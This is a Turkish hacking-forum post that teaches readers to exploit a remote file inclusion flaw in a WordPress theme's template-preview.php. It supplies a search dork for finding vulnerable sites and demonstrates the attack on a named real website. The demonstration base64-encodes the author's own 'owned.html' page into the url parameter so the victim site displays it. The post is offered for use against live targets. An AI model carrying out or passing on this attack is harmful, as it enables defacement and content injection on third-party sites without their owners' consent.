WordPress 4.8 Ait-ThemesClub TemplatePreview 1.8.1 RFI Exploit
Merhaba saygı değer TurkHackTeam mensupları, bu konumda sizlere WP tabanlı bir tema olan Ait-ThemesClub'daki RFI açığının sömürülmesini göstereceğim. Keyifli okumalar dilerim.
Exploit Linki: https://cxsecurity.com/issue/WLB-2019030237
Url tabanlı çalıştığı için kaynak kod bulunmuyor, exploit detaylarına yukarıdaki linkten ulaşabilirsiniz. Exploite gelecek olursak RFI (Remote File Inclusion) isminden de belli olacağı üzere uzaktaki dosyaları görüntülemeyi sağlıyor denilebilir. Burada exploiti yayınlayan kişi bize inurl:/template-preview.php?url= dorkunu vermiş, exploitten yararlanmak için bu dorku kullanabiliriz.
Dork'u aratıp girdiğimiz herhangi bir sitenin url'ine baktığımız zaman son kısmın base64 encode edildiğini görüyoruz. Demek ki eğer sayfada göstermek istediğimiz url'i base64 encode edersek istediğimiz herhangi bir sayfayı göstertebiliriz. Ben burada base64 encode etmek için base64encode.org sitesini kullanacağım, siz istediğinizi kullanabilirsiniz.
Dork'u aratıyor, ve karşıma çıkan ilk siteye giriyorum, ve normalde ki url;
Kod:
http://marketing.messagizer.com/template-preview.php?url=aHR0cDovL2RlbW8ucW9kZWludGVyYWN0aXZlLmNvbS9icmlkZ2U=
Şimdi ise kendi sitemdeki index'in adresini base64 encode edip, hedefimizin önceki url'i ile değiştiriyorum. Sonuç;
Kod:
http://marketing.messagizer.com/template-preview.php?url=aHR0cHM6Ly9iZXIwbC5naXRodWIuaW8vb3duZWQuaHRtbA==
Önceki;
Sonraki;
Okuduğunuz için teşekkürler. İyi forumlar.